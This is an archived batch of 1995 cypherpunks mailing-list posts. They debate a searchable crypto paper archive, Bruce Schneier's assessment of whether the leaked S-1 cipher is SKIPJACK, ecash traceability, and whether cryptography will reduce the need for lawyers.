~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 05:48:12 PDT
To: cypherpunks@toad.com
Subject: Searchable Crypto Paper Archive?
Message-ID: <199509061244.IAA01601@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


[My apologies if this is a repost.  The original was posted a a couple of
days ago via a news gateway which may or may not have actually worked.]


I was trying to dig up some cryptography papers cited as references
today, when a thought hit me; there seem to be a fair amount of crypto
papers available on the Net, but they're pretty scattered.  Bell Labs
has some online, which is great!  The cypherpunks FTP archive has a
few, though you can't perform keyword searches against them.  In
short, it's hard to find papers unless you already know what you want
and where it might be.

Having had some experience in designing and implementing technical
report retrieval services, I naturally think there's room for
improvement here. 8-) What I have in mind is something like NASA's
NTRS ("NASA Technical Report Server",
<http://techreports.larc.nasa.gov/cgi-bin/NTRS>), which I helped
design and implement at my last job.

The basic idea behind NTRS is that users submit a query to a sort of
"search multiplexer" which queries a list of selected databases,
merges the separate result sets and gives them back to the user.  The
results are typically bibliographic and abstract data about papers,
which contain links to the papers themselves if they are available
online, or ordering info if they're not.  From past experience, I
think this model could be applied here very successfully.

One way to accomplish this would be to establish an archive where
people could submit papers to be indexed.  Larger institutions (such
as Bell Labs) might run their own servers, so they would have control
of their own content but could still be searched via the multiplexer.
Users of the service could then search all the different archives they
were interested in with one simple query.

Anyway, this is what I'd like to see.  I'm willing to work on such a
system if there's enough positive feedback.  Does anyone else think
they'd like to use or contribute to such a system?

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 6 Sep 95 06:03:28 PDT
To: cypherpunks@toad.com
Subject: Re: Lotus Notes vs. the Web and the Net
Message-ID: <v02120d04ac733aaa13b8@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 PM 9/5/95, Timothy C. May wrote:
>On this one I agree...and I've said this here on this list. Local groups,
>such as university departments, corporate departments, even entire
>corporations, can use the Web/Net in ways similar to what Lotus Notes
>provides (using their own LANs, or even the Internet, with suitable
>security steps).

My favorite financial application for small multinationals (one of my
clients is a haircutter with 50 salons and 4 schools worldwide) is nightly
remittances to the home office in e$, especially in cash.

The consequences for the banking and tax systems are obvious. But it's
possible to imagine interesting changes in the foriegn exchange markets as
well ...



Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@winternet.com>
Date: Wed, 6 Sep 95 07:09:33 PDT
To: cypherpunks@toad.com
Subject: the S-1 Algorithm
Message-ID: <199509061409.JAA05371@subzero>
MIME-Version: 1.0
Content-Type: text


[I just posted this to sci.crypt.  I don't normally read Cypherpunks, so
please forward any substantive replies directly to me.  Thanks.  -Bruce]


I was in Europe while S-1 was posted, so I missed most of the
discussion.  Better late than never....

Over the last year, I have spent considerable effort collecting
SKIPJACK information.  I have gone through the published
literature, the rumors, and a large stack of documents received
by EPIC through Freedom of Information Act (FOIA) lawsuits.

At Crypto last week I gave a Rump Session talk entitled "Reverse
Engineering SKIPJACK from Open Sources."  I prepared the slides
before I left for Europe.  Here is what I said:

     What the government told us:
          Single-key block cipher.
          Can be used in ECB, CBC, CFB, or OFB.
          64-bit block size.
          80-bit key size.

     What the review committee told us:
          32 rounds.
          No weak keys (like DES has).
          No key complementation property (like DES has).

     What the hardware specifications tell us:
          The latency of the Mykotronx chip has 64 clock cycles. 
               This means two clock cycles per round.

     Assorted rumors (excuse me if I don't reveal sources):
          SKIPJACK does not have rounds in the same sense that
               DES does: i.e., half of the text block is not
               encrypted in each round.
          SKIPJACK has half the total S-box data as DES.
          SKIPJACK has a 48-bit internal structure analogous to a
               32-bit internal structure in DES.
          The masks for the Clipper/Capstone chip are
               unclassified and the chips can be produced in an
               unclassified foundry.  Part of the programming in
               the secure vault includes installing part of the
               SKIPJACK algorithm.  The part of the algorithm
               installed in the secure vault are the "S-tables",
               suggesting that perhaps unprogrammed Clipper chips
               can be programmed to implement other 80-bit key,
               32 round ciphers.

Trying to puzzle out the meaning of the third rumor, Matt Blaze
and I invented something called an Unbalanced Feistel Network. 
These are Feistel networks where the source and target blocks are
of different size.  For example, in each round 48 bits might be
used as an input into the F function, and produce 16 output bits
to be XORed with the remainder of the bits.  We called this a
48:16 UFN, and we proposed a design at last year's Algorithms
Workshop in Leuven.  Our design was broken, but I am still
examining the structure.  A 48:16 UFN satisfies the first and
third rumor above, and I think it as good a guess as any
regarding SKIPJACK.

A few months ago, I found some additional information in the form
of documents released under FOIA.  One document was a Mykotronx
design review for "Project Capstone" dated 10 December 1991.  The
design review was unclassified.  Among the details about the
modular multipliers and the SHA code was the following page about
SKIPJACK:

     ECB Processing Rate

          2 clocks per G-Box operation
          x 1 G-box per shift
          x 32 shifts per ECB encryption
          ______________________________
          64 clocks per ECB

     64 clocks per ECB / 64 bits out per ECB = 1 clock per bit
     Yields 40 Mbit encryption using a 40 MHz clock.

The only other thing I found was a SECRET memo.  The organization
name (either from or to) is blacked out.  The date is 25 August
1992.  The subject is "SKIPJACK Revision."  Paragraph 2 is
blacked out, but paragraph 1 reads:

     1.  (U) The enclosed Informal Technical Report revises the
     F-table in SKIPJACK 3.  No other aspect of the algorithm is
     changed.

That's it.  Rounds are called "shifts," which seems to indicate
that they are not "rounds" in the DES sense.  A shift consists of
a "G-box" operation, which includes not only what we call the F-
F-function but the XOR as well.  And there is something called an
F-table, which could be a table of constants or perhaps a table
of functions.  In any case, it is something that can be revised
without changing the rest of the algorithm.

Now let's look at S-1.  The most probable explanation is that it
is a hoax.  But it is a very good hoax:

     The hoaxer knew enough about algorithm design to make a
          cipher that was not obviously lousy, while at the same
          time not unduly complicated.  The hoaxer knew enough to
          make a design that included three novel ideas not seen
          anywhere else: S-boxes that are created according to no
          known criteria, a G-table that chooses a rotation of
          S-boxes to use in a given round, and a bizarre key
          schedule.
     The hoaxer knew enough about how algorithms are used in the
          military to make a spookish interface.  I am
          particularly interested in the "zeroize" function, the
          separation of the key creation and key loading
          functions, and the key masking.  Blaze said that the
          interface was similar to the Fortezza interface, but
          not the same.
     The hoaxer knew about Blaze's and my MacGuffin paper and
          that we thought SKIPJACK was a 48:16 UFN.  We made no
          secret about this, and our paper is on Blaze's web
          page.  The hoaxer knew to use the term F-table.  I
          haven't shown many people what I found in EPIC's
          documents, so the hoaxer either had to look through
          them himself or get them by some other means (maybe an
          independent FOIA request).

It's not a perfect hoax, though.  The classification markings
look odd: NSA algorithms are SECRET, not TOP SECRET, and the
codeword restriction sentence is strange.  The key schedule is
hopelessly flawed (David Wagner posted an attack to sci.crypt). 
The coding style is amateurish, like it was translated from one
language to another.  (Maybe this is clever on the hoaxer's
part.)  And there's even a typo in the code.

And maybe the hardware latency is wrong.  Clearly the design
facilitates parallelization.  You can precompute all possible F-
table outputs in previous shifts, and then use the G-table result
to select between them; I am not sure you can get a shift down to
two clock cycles.  I don't have the hardware background, and
would appreciate comments from others.

And why are there not bitwise permutations?  If SKIPJACK is
designed for hardware, it makes sense to put them in.  They're
free, after all.

Anyway, it's a real good hoax.  Blaze estimated that he could
have done it, but it would have taken him a month of effort.  I
agree with his assessment: one man-month.  It's a lot of time to
spend on a hoax, especially one where the hoaxer doesn't get any
credit.

So, maybe it's SKIPJACK.  It has a 64-bit block size and an 80-
bit key size.  It's a 48:16 UFN with 32 rounds (or shifts, or
whatever).  And it has an F-table.  This is really interesting,
because the structure really is an S-box.  Everyone knows it's an
S-box, and it makes no sense for a hoaxer to call it something
else.  But in S-1 it's called an F-table.  (I think this is very
significant, but others find it less convincing.)

And the F-table has been revised at least once.  In the code it
says that the F-table entries "differ in the S-2 version."  The
code is dated 1 February 1989 and 31 July 1991, and I have a memo
dated 25 August 1992 that says the F-table has been revised in
"SKIPJACK 3."  Pretty convincing, I think.  (Of course this means
that we can't confirm anything by testing the hardware, since the
F-table entries are different.)

Maybe there are no bit permutations because they make analysis
harder, and perhaps they don't add all that much.  Maybe the
algorithm was designed for both hardware and software, or maybe
it was designed for specialized cryptographic hardware with
several parallel microprocessors and some cryptographic
primitives. 

If it is real, we have a lot to learn about S-box design.  The S-
boxes are not even balanced.  Maybe they are created just so to
avoid some bizarre attack we can only dream about, but I kind of
doubt it.

But the key schedule is just plain wrong.

So, here's a theory.  Let's assume the code is real.  (Not that
it's SKIPJACK, but that it's a real algorithm from some military
or some corporation.)  Clearly the code is not designed to test
the cryptographic algorithm, but to simulate some kind of
hardware interface: it's called a "software chip simulator."  If
I were the NSA and I designed an algorithm whose security rested
on some tables of constants, I might replace them with phony
constants before giving them to another organization to test.  I
might call the phony version S-1 and the real version S-2.

Maybe the code was originally written in FORTRAN, and then
translated into C.  (NSA doesn't use ADA.)

NSA algorithms are classified SECRET, put perhaps algorithms in
development are classified TOP SECRET.  (We know cryptanalytic
techniques can be TOP SECRET, so perhaps commented code falls
under that category as well.)

And maybe the code originally didn't have an 80-bit key schedule.
Maybe it had a longer key schedule.  The poster then modified
this key schedule to make it look more like SKIPJACK.  (This
might also explain the bug in the code, which might not be a bug
if it still had the original key schedule.)

Which leaves us precisely nowhere.  The most likely explanation
is that it is a hoax, but I am hard-pressed to imagine a hoaxer
with the requisite combination of skills, resources, and
attitude.  I also don't believe that it is SKIPJACK.  It might be
a preliminary design for SKIPJACK, but if both the key schedule
and F-table entries are wrong, we really haven't learned
anything.  If we suddenly discovered that unbalanced S-boxes are
far superior to balanced ones, then all best are off.

Bruce

************************************************************************
* Bruce Schneier            2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems       000,000,000,000,000,000,002,000,000,002,293 
* schneier@counterpane.com  The last prime number...alphabetically!
* (708) 524-9461            Two vigintillion, two undecillion, two 
* 730 Fair Oaks Ave.        trillion, two thousand, two hundred and 
* Oak Park, IL  60302       ninety three.
************************************************************************

From owner-cypherpunks  Tue Sep  5 17:00:40 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA01815; Tue, 5 Sep 95 17:00:40 PDT
Received: from yarrina.connect.com.au by toad.com id AA01805; Tue, 5 Sep 95 17:00:25 PDT



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:25:08 PDT
To: "David J. Bianco" <cypherpunks@toad.com
Subject: Re: Searchable Crypto Paper Archive?
Message-ID: <ac73124613021004c605@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 PM 9/6/95, David J. Bianco wrote:

>I was trying to dig up some cryptography papers cited as references
>today, when a thought hit me; there seem to be a fair amount of crypto
>papers available on the Net, but they're pretty scattered.  Bell Labs
>has some online, which is great!  The cypherpunks FTP archive has a
>few, though you can't perform keyword searches against them.  In
>short, it's hard to find papers unless you already know what you want
>and where it might be.
>
>Having had some experience in designing and implementing technical
>report retrieval services, I naturally think there's room for
>improvement here. 8-) What I have in mind is something like NASA's
>NTRS ("NASA Technical Report Server",
><http://techreports.larc.nasa.gov/cgi-bin/NTRS>), which I helped
>design and implement at my last job.

It's an idea with some attraction. But some issues need discussing. Being
an analytical sort of person, prone to looking for flaws in ideas, I'll
mention a few:

1. First and foremost, _copyright_ issues. Most articles are copyrighted
(automatically, by Berne Convention) and the permission of the authors must
be obtained. Authors may also collect royalties, or the conferences may, so
unlimited electronic distribution is a potential problem.

NASA can publish its reports (and those of other government agencies)
electronically because it has the copyrights, or the copyrights are free
and clear. Try putting someone's article on the Net without their
permission and look out.

Indeed, there are a couple of the most important papers on the soda archive
site, some of them scanned-in and OCRed by "The Information Liberation
Front." There are so few that the authors likely don't even know they are
there, or care. But try to put lots of copyrighted material on a site and
get ready for actions. Remember, most nations are party to the Berne
Convention(s).

2. Many of the papers have complex typography, lots of equations and
diagrams. These reproduce poorly on most screens, and really need a new
level of display presentation. (Yes, I know about Adobe Acrobat, which I
have. Ditto for FrameMaker, and a few other such systems. But not many
others have them.)

I happen to know the ILF member who posted the Chaum "Dining
Cryptographers" paper, anonymously, and know that he picked that paper both
because of its importance to his interests and because it was pure text,
with no equations and no diagrams. This made it a natural for scanning.

3. In the crypto domain, the papers are much more conveniently concentrated
into a handful of conference proceedings, nearly all published by
Springer-Verlag. (Those great silvery-grey paperbacks.)

This point about Springer-Verlag relates to Item #1 above. Namely, that
copyright holders (Springer-Verlag, through publishing arrangements with
the conferences) will not take kindly to folks making the papers available
electronically.

This point, about the limited number of main crypto volumes, also implies
another point: many of these papers refer to other papers in the same
volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will
refer to papers in that volume or earlier volumes). This makes it *even
more advantageous* for a serious researcher to buy the complete set of
volumes.

4. Authentication issues. Electronic versions of articles will need to be
signed, to prevent unauthorized modifications. The infrastructure for this
is beginning to build, but is clearly not available to many.

I am confident that someday most journals will be published electronically.
Many people think this likely, whether in 5 years or 15 years. Just too
many advantages.

However--and this is my point--before that happens a huge amount of
negotiation about author's rights to reproduction, about verification of
copies, about royalty payments for copies, etc., has to happen. And, the
display software/hardware is not quite there yet....too many people would
be unable to see the equations and diagrams on the screen. In 5 years, less
of a problem.

Many authors make their papers available by anonymous ftp, or via the Web.
I think this is the way to do it: let those who feel their papers need
electronic dissemination do so. The author makes the choice.

In summary, this project is probably premature (technologically), has
numerous copyright issues to be resolved, and is probably less needed in
the crypto community than in some other areas.

(Granted, we are not following those other areas, necessarily. But that
other domains have not yet gone fully electronic is indicative that others
see some of these same problems, and are likely to address them before the
math/crypto community does.)

Sorry to dissect this proposal so thoroughly, but it's one of the things I do.

--Tim May


(P.S. The copyright problems can possibly be skirted by using anonymous
remailers and offshore data havens in jurisdictions that will not raid the
sites, or by message pools. But these are major steps, mostly untested. A
"Scientology" site is probably a better test than a site with crypto
papers. I wouldn't want to run either of them.)



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Wed, 6 Sep 95 01:46:03 PDT
To: cypherpunks@toad.com
Subject: Equinox/cypherpunks/www
Message-ID: <Pine.SOL.3.91.950906094127.8572B@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anyone that missed or was unable to get the UK TV programme Equinox might 
like to take a look at:

http://www.cityscape.co.uk/channel4/big_bytes/cybersecrecy/cyber000.html

- Andy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 6 Sep 95 08:46:25 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <v02120d11ac72f4de4e9a@[192.0.2.1]>
Message-ID: <199509061545.JAA24947@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 I, Bryce Wilcox <bryce.wilcox@colorado.edu> wrote:
>
> > Suppose you have acquired a million dollars worth of legal, above-board
> > DigiCash dollars and you want to surreptitiously transfer this wealth to 
> > a below-board friend.  Your friend creates a temporary anonymous account 
> > at an understanding bank.


 shamrock@netcom.com (Lucky Green) wrote:
>
> Won't work. Ecash, except as used for frequent flyer like points, will
> exist in only *one* world wide e$ currency, issued by a single entity
> composed of various major banks and subject to US laws. Getting Ecash
> accounts will therefore be subject to the same legal requirenments that
> apply to normal US checking accounts.


1.  Sez who?


2.  We are discussing the feasibility of using DigiCash currency for illegal
money laundering.  We have to assume (ceteris paribus) that the would-be
launderers are still capable of the same tricks that they are currently
capable of, which, apparently, includes access to anonymous bank accounts.

 
> > Now without active physical surveillance, nobody other than yourself and 
> > your friend will ever know where the money went, and you can't prove 
> > that you gave it to him, either...
 
 
> You or a sting operation can always reveal the recipient by publishing the
> blinding factor.


If you do it via his one-time bank account then you can only reveal to which
one-time anonymous account you transferred the money-- no more.


Even if you and your beneficiary don't have this option, the transaction
is still much safer and more convenient if done via DigiCash than via any 
other current currency.  Criminals and conspirators live with the everpresent
problem of betrayal, and this "one step, one way, requires the cooperation of
the payer" traceability seems to me to be a small hassle on the way to a big
win for such people.


> Besides, your Ecash client keeps a log of the payees.


Crytographically (and in the limit, legally) meaningless, right?  I could
edit my log right now to say I gave you a thousand cyberbucks in return for
an illegal copy of some information, but no-one would care.



I appreciate your correspondance.


Bryce

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME3CFvWZSllhfG25AQFi3gQAmyJoB3RJKx3lNb1fCLPluulVbi6kh3+I
++fGXC8vTGOEfaNnkjOxvcZ5VCXRJNlwQB9D2hKICSJCxpoQWKSDjgEWy48HH8AV
P0LSBfQ/LX9O91X7/dkyBCDoULhPx2HYTSbOgumS10+X/IsldUfcY36q0tTQy3u7
7ES5HIG2wv8=
=idOQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 09:56:34 PDT
To: "David J. Bianco" <cypherpunks@toad.com
Subject: Re: Searchable Crypto Paper Archive?
Message-ID: <ac7321aa1402100463c3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 9/6/95, David J. Bianco wrote:

>S'ok with me.  It's not like I'm dead set on doing this or anything.  It's
>just an observation, and an offer of service if anyone thinks it'd be
>useful.
>
>Oh, BTW, another thing I probably should mention that seems obvious to me:
> I'm offering to do this for free.  That is, the database would be a public
>service, with no charge to list papers, add another database to the
>searching list or to query/retrieve abstracts.

I'll look forward to seeing this, then.

I was just noting some issues which seem likely to arise.

But if you plan to do this  "if anyone thinks it's be useful," then I think
it would be useful, so you've met your criterion for doing the project.

Good luck! Keep us posted.


--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 6 Sep 95 07:22:49 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "This discussion is off-topic, please take it elsewhere"
In-Reply-To: <ac71c5aa03021004a06d@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950906102111.539017112C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


You keep talking about this "Eric Hughes" nym.  I've been a member of 
this list for weeks, months, over a year even, and I never see any posts 
from "him".  Is he a dead tentacle?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
This post is smiley-free and may injure the humor-impaired.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 10:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.LNX.3.91.950906103417.19696B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different?  Will they be more
> efficient (cheaper)?
> 
> Put bluntly, will cryptography put lawyers out of business?

I certainly expect the world of business to change and reflect the use of 
crytographic tech as soon as it becomes an acceptable practice to use it.
This may take awhile as the media and current administration continue to 
paint black anyone who wants to use such tech for any reason.

Should there come a time, however, when crypto is a fashionable and 
accepted thing, I would expect to see law offices offering to send and 
recieve documents using such tech, as well as generating and maintaining
keys off-site for clients. With such a legal hoopla being made over 
crypto, I can not fathom lawyers not getting in on the action.. 

While the need for lawyers may decline with the increased use of crypto, 
I do not think they are about to become an endangered species. Those that 
are smart will find a way to profit from it, while those that can not 
adapt will be left behind (and who says lawyers are not part of evolution 
<g>)

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 6 Sep 95 12:52:47 PDT
To: "Cortland D. Starrett" <cort@bioanalytical.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.SUN.3.91.950906114150.20452A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 6 Sep 1995, Cortland D. Starrett wrote:

> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different?  Will they be more
> efficient (cheaper)?

The U.S. legal system is in free fall, and lawyers are almost
totally to blame.  ("Lawyers" as used here includes all judges 
and most legislators.)  This does not mean, however, that 
cryptographic/information/communications technologies can forgo
the use of advocates and arbitors.  There will always be a place
for people who can fulfill these functions.  They may or may not 
be called lawyers, but most of the same folks who now go into 
law, will be the dispute specialists of cyberspace.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cortland D. Starrett" <cort@bioanalytical.com>
Date: Wed, 6 Sep 95 09:54:06 PDT
To: cypherpunks@toad.com
Subject: "Living in real time, side A" (article ref)
Message-ID: <199509061651.LAA00565@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


"Living in real time, side A" by Ted Lewis, Naval Postgraduate School,
is an extremely concise (<3 pages) and insightful look into the future
of information technology and society.  Subjects dear to many cypherpunks
are indirectly addressed throughout.

A detail of particular interest to the lawyers on the list described
"A vapor trail of litigation".  The author notes that, "Plea bargaining,
out-of-court settlements, and appeals are the norm in Post-industrial
legal circles.  These are all legal devices for delaying the opposition
rather than deciding on a proactive course of action.  In the Info Age,
legal procedures will be too cumbersome and too expensive to accommodate
the rate of change."
...
"The mechanisms for protecting Info Age property (information) are
trade secrets and obsolescence."

other key terms:
Moore's Law, civilization on speed, inverse economics, rate of change,
Direct democracy tending toward anarchy...

The article can be found on page 8 of the September issue of IEEE Computer.

Cort.
(Mistakes in quotes are mine.)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 11:56:50 PDT
To: Jep Hill <jep@jephill.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061834.NAA27747@freeside.fc.net>
Message-ID: <Pine.LNX.3.91.950906115101.23559A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> Rob,
> 
> re:  Will Cryptography put lawyers out of business?
> 
> I see no connection between the use/non-use of crypto and the  
> occurrence/non-occurrence of the conflicts and threats of conflicts  
> which give rise to the use of lawyers.  What's the connection?

I know from my employers perspective, that lawyers are retained for more 
than just litigation. Often they handle the exchange of critical 
documents and transactions that need to be kept confidential.

The impact of crypto as I see it is a reduction in the use of legal 
services of this nature, not in litigation. Using a lawyer to pass on 
tech specs on a new product to the patent office is a common occurance, 
as it is assumed that the lawyer can maintain the secrecy required for 
handling these documents. Should the patent office offer a key, you could 
just as easily send an encrypted message in place of a lawyer handling this.

There are bound to be other options and opportunities as well for lawyers 
to use crypto.. securing a companies documents or whatever.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 12:06:02 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <Pine.SUN.3.91.950906135128.3037A-100000@thrash.src.umd.edu>
Message-ID: <Pine.LNX.3.91.950906115827.23559B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> > As far as I know the owner of property has no legal right to kill a person
> > either traspassing or stealing it in any of the 50 states. There was a
>  [...]
> In Maryland you have the responsibility to retreat if possible when 
   [...]
> You certainly do not have the right to use deadly force against someone 
> for any other reason than immediate threat of life or limb to you or 
> someone else.

Being a freedom loving, gun owner, with an interest in maintaining both 
my rights to guns, and my right to cryto, I am saddened to see that you 
have to retreat at all.

As far as I am concerned, if I am in my house, and someone uninvited is 
in there also (burglar/thief/psycho/whatever) then I have already 
sufficiently retreated.. and they will likely be shot. Anyone invading my 
home is considered a threat to my wife, children and myself.

I had heard that in the state of Texas, intruders/trespassers are at 
their own risk after sundown, as it is legal to fire upon them at that 
point, regardless of thier intent.. I have not been able to confirm this, 
as of yet.. but am looking for the answer in my meager spare time.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cortland D. Starrett" <cort@bioanalytical.com>
Date: Wed, 6 Sep 95 10:11:51 PDT
To: cypherpunks@toad.com
Subject: cryptography eliminates lawyers?
Message-ID: <199509061709.MAA00612@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


As a follow-up to the article reference I posted, I pose the
following question:

Will cryptographic technology and information (communication)
technology reduce the need for legal services in the future?
(especially regarding contracts, buying/selling, patent law, etc.)
Will legal services just look different?  Will they be more
efficient (cheaper)?

Put bluntly, will cryptography put lawyers out of business?

Any comments would be appreciated.

Cort.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 12:18:09 PDT
To: cypherpunks@toad.com
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <ac73405d150210049a10@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:32 PM 9/6/95, Al Thompson wrote:
>At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:
>
>>Created crimes are few and far between.
>
>You mean like buying a 30 round magazine, or putting a different
>stock of your choice on a rifle, or owning an automatic weapon,
>or mailing crypto out of the country, or hiring someone due to their
>race, or not hiring someone because they are "fat?"

Or drinking alcohol, or owning gold, or possessing a copy of a Traci Lords
video, or selling bullets recently declared illegal, or having a "men only"
gym (but "women only" gyms are legal), or making condoms available, or not
making condoms available, or teaching women how to use birth control, or
denying a Satanist a job at a child care center on the basis of his
religious beliefs, and so on. Too many transient, created crimes.

To answer Lucky's original question, one way to measure the total number of
new laws--most of them covering "created crimes"--is to measure the total
number of volumes of statutes at the Federal, state, and local levels.

I've seen figures on the "linear feet" of regulations, and how they are
growing exponentially, but I don't recall the numbers. Something like the
total number of laws doubling every 10 years or so, but don't quote me on
this one.

Whether these are "created crimes" in most cases is unclear, but certainly
the really basic crimes (murder, assault, rape, theft, etc.) were
adequately covered 20 years ago, or 50 years ago, etc. I can see some
reasons for refining the definitions in the light of new situations, but I
have to conclude that _most_ of the vast number of new laws and statutes
deal with "created crimes," as I understand the term.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 09:46:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Searchable Crypto Paper Archive?
In-Reply-To: <ac73124613021004c605@[205.199.118.202]>
Message-ID: <199509061642.MAA01932@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 6,  9:36, Timothy C. May sent the following to the NSA's mail
archives:
> Subject: Re: Searchable Crypto Paper Archive?

Thanks for the reply.  I think there are a few misconceptions, though.
  I've responded in place to some of your comments...

||
|| It's an idea with some attraction. But some issues need discussing.
Being
|| an analytical sort of person, prone to looking for flaws in ideas, I'll
